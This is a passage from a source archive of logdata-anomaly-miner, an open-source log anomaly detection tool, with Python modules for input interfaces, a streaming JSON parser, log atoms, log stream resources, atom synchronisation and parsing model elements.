None: for argument in mutable_default_args: if hasattr(self, argument) and getattr(self, argument) is not None: continue if argument.endswith("list"): setattr(self, argument, []) elif argument.endswith("dict"): setattr(self, argument, {}) elif argument.endswith("set"): setattr(self, argument, set()) elif argument.endswith("tuple"): setattr(self, argument, ()) if hasattr(self, "subhandler_list"): if (not isinstance(self.subhandler_list, list)) or \ (not all(isinstance(handler, AtomHandlerInterface) for handler in self.subhandler_list)): msg = "Only subclasses of AtomHandlerInterface allowed in subhandler_list." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) for handler_pos, handler_element in enumerate(self.subhandler_list): self.subhandler_list[handler_pos] = (handler_element, stop_when_handled_flag) if hasattr(self, "allowed_id_tuples"): if self.allowed_id_tuples is None: self.allowed_id_tuples = [] else: self.allowed_id_tuples = [tuple(tuple_list) for tuple_list in self.allowed_id_tuples] if hasattr(self, "confidence_factor") and not 0 <= self.confidence_factor <= 1: logging.getLogger(DEBUG_LOG_NAME).warning('confidence_factor must be in the range [0,1]!') self.confidence_factor = 1 @abc.abstractmethod def receive_atom(self, log_atom): """ Receive a log atom from a source. @param log_atom binary raw atom data @return True if this handler was really able to handle and process the atom. Depending on this information, the caller may decide if it makes sense passing the atom also to other handlers or to retry later. This behaviour has to be documented at each source implementation sending LogAtoms. """ def log_statistics(self, component_name): """ Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL > 0: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) self.log_success = 0 self.log_total = 0 class LogDataResource(metaclass=abc.ABCMeta): """ This is the superinterface of each logdata resource monitored by aminer. The interface is designed in a way, that instances of same subclass can be used both on aminer parent process side for keeping track of the resources and forwarding the file descriptors to the child, but also on child side for the same purpose. The only difference is, that on child side, the stream reading and read continuation features are used also. After creation on child side, this is the sole place for reading and closing the streams. An external process may use the file descriptor only to wait for input via select. """ @abc.abstractmethod def __init__(self, log_resource_name, log_stream_fd, default_buffer_size=1 << 16, repositioning_data=None): """ Create a new LogDataResource. Object creation must not touch the logStreamFd or read any data, unless repositioning_data was given. In the later case, the stream has to support seek operation to reread data. @param log_resource_name the unique encoded name of this source as byte array. @param log_stream_fd the stream for reading the resource or -1 if not yet opened. @param repositioning_data if not None, attemt to position the the stream using the given data. """ @abc.abstractmethod def open(self, reopen_flag=False): """ Open the given resource. @param reopen_flag when True, attempt to reopen the same resource and check if it differs from the previously opened one. @raise Exception if valid logStreamFd was already provided, is still open and reopenFlag is False. @raise OSError when opening failed with unexpected error. @return True if the resource was really opened or False if opening was not yet possible but should be attempted again. """ @abc.abstractmethod def get_resource_name(self): """Get the name of this log resource.""" @abc.abstractmethod def get_file_descriptor(self): """Get the file descriptor of this open resource.""" @abc.abstractmethod def fill_buffer(self): """ Fill the buffer data of this resource. The repositioning information is not updated, update_position() has to be used. @return the number of bytes read or -1 on error or end. """ @abc.abstractmethod def update_position(self, length): """Update the positioning information and discard the buffer data afterwards.""" @abc.abstractmethod def get_repositioning_data(self): """Get the data for repositioning the stream. The returned structure has to be JSON serializable.""" @abc.abstractmethod def close(self): """Close this logdata resource. Data access methods will not work any more afterwards.""" JsonStateMachine.py000066400000000000000000000222151437606560100340420ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/input# DISCLAIMER: adapted code from # https://stackoverflow.com/questions/6886283/how-i-can-i-lazily-read-multiple-json-values-from-a-file-stream-in-python # A streaming byte oriented JSON parser. Feed it a single byte at a time and # it will emit complete objects as it comes across them. Whitespace within and # between objects is ignored. This means it can parse newline delimited JSON. import math def json_machine(emit, next_func=None): # skipcq: PY-D0003 def _value(byte_data): # skipcq: PY-D0003 if not byte_data: return None if byte_data in (0x09, 0x0a, 0x0d, 0x20): return _value # Ignore whitespace # only allow json objects in our case if byte_data != 0x7b and next_func is _value: return None if byte_data == 0x22: # " return string_machine(on_value) if byte_data in (0x2b, 0x2d) or (0x30 <= byte_data < 0x3a): # -, + or 0-9 return number_machine(byte_data, on_number) if byte_data == 0x7b: #: return object_machine(on_value) if byte_data == 0x5b: # [ return array_machine(on_value) if byte_data == 0x74: # t return constant_machine(TRUE, True, on_value) if byte_data == 0x66: # f return constant_machine(FALSE, False, on_value) if byte_data == 0x6e: # n return constant_machine(NULL, None, on_value) if next_func is _value: return None return next_func(byte_data) def on_value(value): # skipcq: PY-D0003, PTC-W0065 emit(value) return next_func def on_number(number, byte): # skipcq: PY-D0003, PTC-W0065 emit(number) return _value(byte) next_func = next_func or _value return _value TRUE = [0x72, 0x75, 0x65] FALSE = [0x61, 0x6c, 0x73, 0x65] NULL = [0x75, 0x6c, 0x6c] def constant_machine(bytes_data, value, emit): # skipcq: PY-D0003 i = 0 length = len(bytes_data) def _constant(byte_data): # skipcq: PY-D0003 nonlocal i if byte_data != bytes_data[i]: i += 1 return None i += 1 if i < length: return _constant return emit(value) return _constant def string_machine(emit): # skipcq: PY-D0003 string = "" def _string(byte_data): # skipcq: PY-D0003 nonlocal string if byte_data == 0x22: # " return emit(string) if byte_data == 0x5c: # \ return _escaped_string if byte_data & 0x80: # UTF-8 handling return utf8_machine(byte_data, on_char_code) if byte_data < 0x20 and byte_data != 0xa: # ASCII control character - \n is allowed return None string += chr(byte_data) return _string def _escaped_string(byte_data): # skipcq: PY-D0003, PTC-W0065 nonlocal string if byte_data in (0x22, 0x5c, 0x2f): # " \ / string += chr(byte_data) return _string if byte_data == 0x62: # b string += "\b" return _string if byte_data == 0x66: # f string += "\f" return _string if byte_data == 0x6e: # n string += "\n" return _string if byte_data == 0x72: # r string += "\r" return _string if byte_data == 0x74: # t string += "\t" return _string if byte_data == 0x75: # u return hex_machine(on_char_code) return None def on_char_code(char_code): # skipcq: PY-D0003, PTC-W0065 nonlocal string string += chr(char_code) return _string return _string # Nestable state machine for UTF-8 Decoding. def utf8_machine(byte_data, emit): # skipcq: PY-D0003 left = 0 num = 0 def _utf8(byte_data): # skipcq: PY-D0003 nonlocal num, left if (byte_data & 0xc0) != 0x80: return None left = left - 1 num |= (byte_data & 0x3f) << (left * 6) if left: return _utf8 return emit(num) if 0xc0 <= byte_data < 0xe0: # 2-byte UTF-8 Character left = 1 num = (byte_data & 0x1f) << 6 return _utf8 if 0xe0 <= byte_data < 0xf0: # 3-byte UTF-8 Character left = 2 num = (byte_data & 0xf) << 12 return _utf8 if 0xf0 <= byte_data < 0xf8: # 4-byte UTF-8 Character left = 3 num = (byte_data & 0x07) << 18 return _utf8 return None # Nestable state machine for hex escaped characters def hex_machine(emit): # skipcq: PY-D0003 left = 4 num = 0 def _hex(byte_data): # skipcq: PY-D0003 nonlocal num, left if 0x30 <= byte_data < 0x3a: i = byte_data - 0x30 elif 0x61 <= byte_data <= 0x66: i = byte_data - 0x57 elif 0x41 <= byte_data <= 0x46: i = byte_data - 0x37 else: return None left -= 1 num |= i << (left * 4) if left: return _hex return emit(num) return _hex def number_machine(byte_data, emit): # skipcq: PY-D0003 sign = 1 number = 0 decimal = 0 esign = 1 exponent = 0 dividend = 10 start_with_zero = False def _mid(byte_data): # skipcq: PY-D0003 if start_with_zero and byte_data not in (0x2e, 0x45, 0x65, 0x7d, 0x2c, 0xa, 0x20): # . E e } , \n Space return None if byte_data == 0x2e: # . return _decimal return _later(byte_data) def _number(byte_data): # skipcq: PY-D0003 nonlocal number if 0x30 <= byte_data < 0x3a: number = number * 10 + (byte_data - 0x30) return _number return _mid(byte_data) def _start(byte_data): # skipcq: PY-D0003 nonlocal start_with_zero if byte_data == 0x30: start_with_zero = True return _mid if 0x30 < byte_data < 0x3a: return _number(byte_data) return None def _decimal(byte_data): # skipcq: PY-D0003 nonlocal decimal nonlocal dividend if 0x30 <= byte_data < 0x3a: decimal += (byte_data - 0x30) / dividend dividend *= 10 return _decimal return _later(byte_data) def _later(byte_data): # skipcq: PY-D0003, PTC-W0065 if byte_data in (0x45, 0x65): # E e return _esign return _done(byte_data) def _esign(byte_data): # skipcq: PY-D0003, PTC-W0065 nonlocal esign if byte_data == 0x2b: # + return _exponent if byte_data == 0x2d: # - esign = -1 return _exponent return _exponent(byte_data) def _exponent(byte_data): # skipcq: PY-D0003 nonlocal exponent if 0x30 <= byte_data < 0x3a: exponent = exponent * 10 + (byte_data - 0x30) return _exponent return _done(byte_data) def _done(byte_data): # skipcq: PY-D0003, PTC-W0065 value = sign * (number + decimal) if exponent: value *= math.pow(10, esign * exponent) return emit(value, byte_data) if byte_data == 0x2d: # - sign = -1 return _start if byte_data == 0x2b: # + return _start return _start(byte_data) def array_machine(emit): # skipcq: PY-D0003 array_data = [] def _array(byte_data): # skipcq: PY-D0003 if byte_data == 0x5d: # ] return emit(array_data) return json_machine(on_value, _comma)(byte_data) def on_value(value): # skipcq: PY-D0003 array_data.append(value) def _comma(byte_data): # skipcq: PY-D0003 if byte_data in (0x09, 0x0a, 0x0d, 0x20): return _comma # Ignore whitespace if byte_data == 0x2c: # , return json_machine(on_value, _comma) if byte_data == 0x5d: # ] return emit(array_data) return None return _array def object_machine(emit): # skipcq: PY-D0003 object_data = {} key = None def _object(byte_data): # skipcq: PY-D0003 if byte_data == 0x7d: # return emit(object_data) return _key(byte_data) def _key(byte_data): # skipcq: PY-D0003 if byte_data in (0x09, 0x0a, 0x0d, 0x20): return _object # Ignore whitespace if byte_data == 0x22: return string_machine(on_key) return None def on_key(result): # skipcq: PY-D0003, PTC-W0065 nonlocal key key = result return _colon def _colon(byte_data): # skipcq: PY-D0003 if byte_data in (0x09, 0x0a, 0x0d, 0x20): return _colon # Ignore whitespace if byte_data == 0x3a: # : return json_machine(on_value, _comma) return None def on_value(value): # skipcq: PY-D0003, PTC-W0065 object_data[key] = value def _comma(byte_data): # skipcq: PY-D0003 if byte_data in (0x09, 0x0a, 0x0d, 0x20): return _comma # Ignore whitespace if byte_data == 0x2c: # , return _key if byte_data == 0x7d: # return emit(object_data) return None return _object logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/input/LogAtom.py000066400000000000000000000035401437606560100322640ustar00rootroot00000000000000""" This module defines a log atom. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ class LogAtom: """This class defines a log atom used for parsing.""" def __init__(self, raw_data, parser_match, atom_time, source): """Create a log atom from scratch.""" self.raw_data = raw_data self.parser_match = parser_match self.atom_time = atom_time self.source = source def get_parser_match(self): """ Get the parser match associated with this LogAtom. @return the match or None for (yet) unparsed LogAtoms. """ return self.parser_match def set_timestamp(self, timestamp): """ Update the default timestamp value associated with this LogAtom. The method can be called more than once to allow correction of fine-adjusting of timestamps by analysis filters after initial parsing procedure. """ self.atom_time = timestamp def get_timestamp(self): """ Get the default timestamp value for this LogAtom. @return the timestamp as number of seconds since 1970. """ return self.atom_time def is_parsed(self): """Check if this atom is parsed by checking if parserMatch object is attached.""" return self.parser_match is not None logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/input/LogStream.py000066400000000000000000000436521437606560100326270ustar00rootroot00000000000000""" This module contains interfaces and classes for logdata resource handling and combining them to resumable virtual LogStream objects. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import base64 import errno import hashlib import os import socket import stat import sys import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.util import SecureOSFunctions from aminer.util.StringUtil import encode_byte_string_as_string from aminer.input.InputInterfaces import LogDataResource class FileLogDataResource(LogDataResource): """ This class defines a single log data resource using an underlying file accessible via the file descriptor. The characteristics of this type of resource is, that reopening and repositioning of the stream has to be possible. """ def __init__(self, log_resource_name, log_stream_fd, default_buffer_size=1 << 16, repositioning_data=None): """ Create a new file type resource. @param log_resource_name the unique name of this source as bytes array, has to start with "file://" before the file path. @param log_stream_fd the stream for reading the resource or -1 if not yet opened. @param repositioning_data if not None, attempt to position the stream using the given data. """ if not log_resource_name.startswith(b'file://'): msg = 'Attempting to create different type resource as file' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) self.log_resource_name = log_resource_name self.log_file_fd = log_stream_fd self.stat_data = None if self.log_file_fd >= 0: self.stat_data = os.fstat(log_stream_fd) self.buffer = b'' self.default_buffer_size = default_buffer_size self.total_consumed_length = 0 # Create a hash for repositioning. There is no need to be cryptographically secure here: if upstream can manipulate the content, # to provoke hash collisions, correct positioning would not matter anyway. # skipcq: PTC-W1003, BAN-B324 self.repositioning_digest = hashlib.md5() if (log_stream_fd != -1) and (repositioning_data is not None): if repositioning_data[0] != self.stat_data.st_ino: msg = f'Not attempting to reposition on {encode_byte_string_as_string(self.log_resource_name)}, inode number mismatch' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print(msg, file=sys.stderr) elif repositioning_data[1] > self.stat_data.st_size: msg = f'Not attempting to reposition on {encode_byte_string_as_string(self.log_resource_name)}, file size too small' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print(msg, file=sys.stderr) else: # skipcq: PTC-W1003, BAN-B324 hash_algo = hashlib.md5() length = repositioning_data[1] while length != 0: block = None if length < default_buffer_size: block = os.read(self.log_file_fd, length) else: block = os.read(self.log_file_fd, default_buffer_size) if not block: msg = f'Not attempting to reposition on {encode_byte_string_as_string(self.log_resource_name)}, file shrunk while' \ f' reading' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print(msg, file=sys.stderr) break hash_algo.update(block) length -= len(block) digest = hash_algo.digest() if length == 0: if digest == base64.b64decode(repositioning_data[2]): # Repositioning is OK, keep current digest and length data. self.total_consumed_length = repositioning_data[1] self.repositioning_digest = hash_algo else: msg = f'Not attempting to reposition on {encode_byte_string_as_string(self.log_resource_name)}, digest changed' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print(msg, file=sys.stderr) length = -1 if length != 0: # Repositioning failed, go back to the beginning of the stream. os.lseek(self.log_file_fd, 0, os.SEEK_SET) def open(self, reopen_flag=False): """ Open the given resource. @param reopen_flag when True, attempt to reopen the same resource and check if it differs from the previously opened one. @raise Exception if valid log_stream_fd was already provided, is still open and reopen_flag is False. @raise OSError when opening failed with unexpected error. @return True if the resource was really opened or False if opening was not yet possible but should be attempted again. """ if not reopen_flag and (self.log_file_fd != -1): msg = 'Cannot reopen stream still open when not instructed to do so' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) log_file_fd = -1 stat_data = None try: log_file_fd = SecureOSFunctions.secure_open_file(self.log_resource_name[7:], os.O_RDONLY) stat_data = os.fstat(log_file_fd) except OSError as openOsError: msg = f'OSError occurred in FileLogDataResource.open(). Error message: {openOsError}' logging.getLogger(DEBUG_LOG_NAME).error(msg) if log_file_fd != -1: os.close(log_file_fd) if openOsError.errno == errno.ENOENT: return False raise if not stat.S_ISREG(stat_data.st_mode) and not stat.S_ISFIFO(stat_data.st_mode): os.close(log_file_fd) msg = f'Attempting to open non-regular file {encode_byte_string_as_string(self.log_resource_name)} as file' print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if reopen_flag and (self.stat_data is not None) and (stat_data.st_ino == self.stat_data.st_ino) and ( stat_data.st_dev == self.stat_data.st_dev): # Reopening was requested, but we would reopen the file already opened, which is of no use. os.close(log_file_fd) return False # This is a new file or a successful reopen attempt. self.log_file_fd = log_file_fd self.stat_data = stat_data return True def get_resource_name(self): """Get the name of this log resource.""" return self.log_resource_name def get_file_descriptor(self): """Get the file descriptor of this open resource.""" return self.log_file_fd def fill_buffer(self): """ Fill the buffer data of this resource. The repositioning information is not updated, update_position() has to be used. @return the number of bytes read or -1 on error or end. """ data = os.read(self.log_file_fd, self.default_buffer_size) self.buffer += data return len(data) def update_position(self, length): """Update the positioning information and discard the buffer data afterwards.""" self.repositioning_digest.update(self.buffer[:length]) self.total_consumed_length += length self.buffer = self.buffer[length:] def get_repositioning_data(self): """Get the data for repositioning the stream. The returned structure has to be JSON serializable.""" return [self.stat_data.st_ino, self.total_consumed_length, base64.b64encode(self.repositioning_digest.digest())] def close(self): """Close the log file.""" os.close(self.log_file_fd) self.log_file_fd = -1 class UnixSocketLogDataResource(LogDataResource): """ This class defines a single log data resource connecting to a local UNIX socket. The characteristics of this type of resource is, that reopening works only after end of stream of was reached. """ # skipcq: PYL-W0231, PYL-W0613 def __init__(self, log_resource_name, log_stream_fd, default_buffer_size=1 << 16, repositioning_data=None): """ Create a new unix socket type resource. @param log_resource_name the unique name of this source as byte array, has to start with "unix://" before the file path. @param log_stream_fd the stream for reading the resource or -1 if not yet opened. @param repositioning_data has to be None for this type of resource. """ if not log_resource_name.startswith(b'unix://'): msg = 'Attempting to create different type resource as unix' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) self.log_resource_name = log_resource_name self.log_stream_fd = log_stream_fd self.buffer = b'' self.default_buffer_size = default_buffer_size self.total_consumed_length = 0 def open(self, reopen_flag=False): """ Open the given resource. @param reopen_flag when True, attempt to reopen the same resource and check if it differs from the previously opened one. @raise Exception if valid log_stream_fd was already provided, is still open and reopenFlag is False. @raise OSError when opening failed with unexpected error. @return True if the resource was really opened or False if opening was not yet possible but should be attempted again. """ if reopen_flag: # skipcq: PTC-W0048 if self.log_stream_fd != -1: return False elif self.log_stream_fd != -1: msg = 'Cannot reopen stream still open when not instructed to do so' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) log_socket = None try: log_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) log_socket.connect(self.log_resource_name[7:]) except socket.error as socketError: logging.getLogger(DEBUG_LOG_NAME).error( "OSError occurred in UnixSocketLogDataResource.open(). Error message: %s", socketError.msg) if log_socket is not None: log_socket.close() if socketError.errno in (errno.ENOENT, errno.ECONNREFUSED): return False # Transform exception to OSError as caller does not expect something else. raise OSError(socketError[0], socketError[1]) self.log_stream_fd = os.dup(log_socket.fileno()) log_socket.close() return True def get_resource_name(self): """Get the name of this log resoruce.""" return self.log_resource_name def get_file_descriptor(self): """Get the file descriptor of this open resource.""" return self.log_stream_fd def fill_buffer(self): """ Fill the buffer data of this resource. The repositioning information is not updated, update_position() has to be used. @return the number of bytes read or -1 on error or end. """ data = os.read(self.log_stream_fd, self.default_buffer_size) self.buffer += data return len(data) def update_position(self, length): """Update the positioning information and discard the buffer data afterwards.""" self.total_consumed_length += length self.buffer = self.buffer[length:] # skipcq: PYL-R0201 def get_repositioning_data(self): """Get the data for repositioning the stream. The returned structure has to be JSON serializable.""" return None def close(self): """Close the log stream.""" os.close(self.log_stream_fd) self.log_stream_fd = -1 class LogStream: """ This class defines a continuous stream of logging data from a given source. This class also handles rollover from one file descriptor to a new one. """ def __init__(self, log_data_resource, stream_atomizer): """ Create a new logstream with an initial logDataResource. @param stream_atomizer the atomizer to forward data to. """ # The resource currently processed. Might also be None when previous # resource was read till end and no rollover to new one had occurred. self.log_data_resource = log_data_resource self.stream_atomizer = stream_atomizer # Last reading state, those are the same as returned by StreamAtomizer # consumeData() method. Start with state 0 (more data required). self.last_consume_state = 0 self.next_resources = [] def add_next_resource(self, next_log_data_resource): """ Roll over from one fd to another one pointing to the newer version of the same file. This will also change reading behaviour of current resource to await EOF or stop as soon as first blocking read does not return any data. """ # Just append the resource to the list of next resources. The next read operation without any input from the primary resource # will pick it up automatically. if self.log_data_resource is None: self.log_data_resource = next_log_data_resource else: self.next_resources.append(next_log_data_resource) def handle_stream(self): """ Handle data from this stream by forwarding it to the atomizer. @return the file descriptor to monitoring for new input or -1 if there is no new data or atomizer was not yet ready to consume data. Handling should be tried again later on. """ if self.log_data_resource is None: return -1 if self.last_consume_state == 0: # We need more data, read it. read_length = self.log_data_resource.fill_buffer() if read_length == -1: self.last_consume_state = self.roll_over() return self.last_consume_state if read_length == 0: if not self.next_resources: # There is just no input, but we still need more since last round as indicated by lastConsumeState. We would not have # been called if this is a blocking stream, so this must be the preliminary end of the file. Tell caller to wait and # retry read later on. Keep lastConsumeState value, consume still wants more data. return -1 # This seems to EOF for rollover. self.last_consume_state = self.roll_over() return self.last_consume_state # So there was something read, process it the same way as if data was already available in previous round. self.last_consume_state = self.stream_atomizer.consume_data(self.log_data_resource.buffer, False) if self.last_consume_state < 0: return -1 if self.last_consume_state != 0: self.log_data_resource.update_position(self.last_consume_state) return self.log_data_resource.get_file_descriptor() def roll_over(self): """ End reading of the current resource and switch to the next. This method does not handle last_consume_state, that has to be done outside. @return state in same manner as handle_stream() """ consumed_length = self.stream_atomizer.consume_data(self.log_data_resource.buffer, True) if consumed_length < 0: # Consumer is not ready to consume yet. Retry later on. return -1 if consumed_length != len(self.log_data_resource.buffer): if consumed_length != 0: # Some data consumed, unclear why not all when already at end of stream. Retry again immediately to find out why. self.log_data_resource.update_position(consumed_length) return self.log_data_resource.get_file_descriptor() # This is a clear protocol violation (see StreamAtomizer documentation): When at EOF, 0 is no valid return value. msg = f'Procotol violation by {self.stream_atomizer.__class__.__name__} detected, flushing data' logging.getLogger(DEBUG_LOG_NAME).critical(msg) print('FATAL: ' + msg, file=sys.stderr) consumed_length = len(self.log_data_resource.buffer) # Everything consumed, so now ready for rollover. self.log_data_resource.update_position(consumed_length) self.log_data_resource.close() if not self.next_resources: self.log_data_resource = None return -1 self.log_data_resource = self.next_resources[0] del self.next_resources[0] return self.log_data_resource.get_file_descriptor() def get_current_fd(self): """Get the file descriptor for reading the currently active log_data resource.""" if self.log_data_resource is None: return -1 return self.log_data_resource.get_file_descriptor() def get_repositioning_data(self): """Get the repositioning information from the currently active underlying log_data resource.""" if self.log_data_resource is None: return None return self.log_data_resource.get_repositioning_data() def close(self): """Close the log stream.""" if self.log_data_resource is not None: self.log_data_resource.close() SimpleByteStreamLineAtomizerFactory.py000066400000000000000000000045701437606560100377530ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/input""" This module defines a factory for instanciating line atomizers. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.input.InputInterfaces import AtomizerFactory from aminer.input.ByteStreamLineAtomizer import ByteStreamLineAtomizer class SimpleByteStreamLineAtomizerFactory(AtomizerFactory): """ This factory just creates the same atomizer for each new resource. All parsed and unparsed atoms are delivered via two lists of handlers. """ def __init__( self, parsing_model, atom_handler_list, event_handler_list, default_timestamp_path_list=None, eol_sep=b'\n', json_format=False): """ Create the factory to forward data and events to the given lists for each newly created atomizer. @param default_timestamp_path_list if not empty list, the value of this timestamp field is extracted from parsed atoms and stored as default timestamp for that atom. """ self.parsing_model = parsing_model self.atom_handler_list = atom_handler_list self.event_handler_list = event_handler_list if default_timestamp_path_list is None: self.default_timestamp_path_list = [] else: self.default_timestamp_path_list = default_timestamp_path_list self.eol_sep = eol_sep self.json_format = json_format def get_atomizer_for_resource(self, resource_name): # skipcq: PYL-W0613 """ Get an atomizer for a given resource. @param resource_name the resource name for atomizer selection is ignored in this type of factory. @return a StreamAtomizer object """ return ByteStreamLineAtomizer(self.parsing_model, self.atom_handler_list, self.event_handler_list, 1 << 16, self.default_timestamp_path_list, self.eol_sep, self.json_format) SimpleMultisourceAtomSync.py000066400000000000000000000134321437606560100360070ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/input""" This module defines a handler that synchronizes different streams. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import time from aminer.input.InputInterfaces import AtomHandlerInterface class SimpleMultisourceAtomSync(AtomHandlerInterface): """ This class synchronizes different atom streams by forwarding the atoms only from the source delivering the oldest ones. This is done using the atom timestamp value. Atoms without a timestamp are forwarded immediately. When no atoms are received from a source for some time, no more atoms are expected from that source. This will allow forwarding of blocked atoms from other sources afterwards. """ def __init__(self, atom_handler_list, sync_wait_time=5): """ @param atom_handler_list forward atoms to all handlers in the list, no matter if the log_atom was handled or not. @return true as soon as forwarding was attempted, no matter if one downstream handler really consumed the atom. """ self.atom_handler_list = atom_handler_list self.sync_wait_time = sync_wait_time # Last forwarded log atom timestamp self.last_forward_timestamp = 0 # The dictionary containing the currently active sources. Each entry is a list with two values: # * the largest timestamp of a LogAtom forwarded from this source so far. # * the current LogAtom pending to be forwarded or None if all atoms were forwarded self.sources_dict = {} # The local clock time when blocking was enabled for any source. Start in blocking mode to have chance to see atom from each # available source before forwarding the first ones. self.blocking_end_time = time.time() + self.sync_wait_time self.blocking_sources = 0 self.timestamps_unsorted_flag = False self.last_forwarded_source = None self.buffer_empty_counter = 0 def receive_atom(self, log_atom): """Receive a log atom from a source.""" if self.last_forwarded_source is not None and log_atom.source != self.last_forwarded_source and self.buffer_empty_counter < ( 2 * len(self.sources_dict.keys())): self.buffer_empty_counter += 1 return False self.buffer_empty_counter = 0 self.last_forwarded_source = None timestamp = log_atom.atom_time if timestamp is None: self.forward_atom(log_atom) self.last_forwarded_source = log_atom.source return True source_info = self.sources_dict.get(log_atom.source) if source_info is None: source_info = [timestamp, log_atom] self.sources_dict[log_atom.source] = source_info else: if timestamp < source_info[0]: # Atoms not sorted, not our problem. Forward it immediately. self.timestamps_unsorted_flag = True self.forward_atom(log_atom) self.last_forwarded_source = log_atom.source return True if source_info[1] is None: source_info[1] = log_atom # Source information with the oldest pending atom. oldest_source_info = None has_idle_sources_flag = False for source_info in self.sources_dict.values(): if source_info[1] is None: has_idle_sources_flag = True continue if oldest_source_info is None: oldest_source_info = source_info continue if source_info[1].atom_time < oldest_source_info[1].atom_time: oldest_source_info = source_info if self.blocking_end_time != 0: # We cannot do anything while blocking to catch more atoms. if self.blocking_end_time > time.time(): return False # Blocking has expired, cleanup the blockers. expired_sources = [] for source, source_info in self.sources_dict.items(): if source_info[1] is None: expired_sources.append(source) for source in expired_sources: del self.sources_dict[source] self.blocking_end_time = 0 self.blocking_sources = 0 has_idle_sources_flag = False if has_idle_sources_flag: # We cannot let this item pass. Before entering blocking state, give all other sources also the chance to submit an atom. if self.blocking_sources == len(self.sources_dict): self.blocking_end_time = time.time() + self.sync_wait_time else: self.blocking_sources += 1 return False # No idle sources, just forward atom from the oldest one if that is really the currently active source. if log_atom != oldest_source_info[1]: return False self.forward_atom(log_atom) self.last_forwarded_source = log_atom.source oldest_source_info[1] = None if timestamp > oldest_source_info[0]: oldest_source_info[0] = timestamp self.blocking_sources = 0 return True def forward_atom(self, log_atom): """Forward atom to all atom handlers.""" for handler in self.atom_handler_list: handler.receive_atom(log_atom) logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing/000077500000000000000000000000001437606560100306525ustar00rootroot00000000000000AnyByteDataModelElement.py000066400000000000000000000027041437606560100356100ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing""" This module defines a model element that matches any byte. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface class AnyByteDataModelElement(ModelElementInterface): """This class matches any byte but at least one. Thus, a match will always span the complete data from beginning to end.""" def get_match_element(self, path: str, match_context): """ Just return a match including all data from the context. @param path to be printed in the MatchElement. @param match_context the match_context to be analyzed. """ match_data = match_context.match_data if not match_data: return None match_context.update(match_data) return MatchElement(f"{path}/{self.element_id}", match_data, match_data, None) Base64StringModelElement.py000066400000000000000000000044751437606560100356650ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing""" This module provides base64 string matching. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import base64 import re from aminer import AminerConfig from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.parsing.MatchElement import MatchElement class Base64StringModelElement(ModelElementInterface): """This class just tries to strip off as many base64 bytes as possible from a given data string.""" def __init__(self, element_id: str): """ Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. """ super().__init__(element_id) self.regex = 